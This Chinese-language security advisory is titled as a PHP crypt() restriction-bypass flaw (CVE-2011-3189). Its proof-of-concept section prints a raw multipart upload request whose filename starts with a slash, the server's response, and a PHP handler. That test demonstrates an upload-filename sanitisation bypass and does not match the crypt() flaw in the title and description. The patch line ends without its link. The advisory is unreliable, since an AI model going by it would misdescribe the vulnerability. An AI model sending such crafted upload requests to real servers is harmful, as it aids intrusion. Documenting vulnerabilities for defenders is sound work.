PHP “crypt()”函数安全限制绕过漏洞
发布日期:2012-02-02
更新日期:2012-02-03
受影响系统:
Apple MacOS X Server 10.x
PHP PHP 5.3.7
PHP PHP 5.3.6
PHP PHP 5.3.5
不受影响系统:
Apple MacOS X Server 10.7.3
PHP PHP 5.3.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49376
CVE ID: CVE-2011-3189
PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。
PHP在crypt()函数的实现上存在安全漏洞,攻击者可利用此漏洞绕过某些安全限制。
<*来源:Jo of feuersee.de
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200
------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain
any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
<?php
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: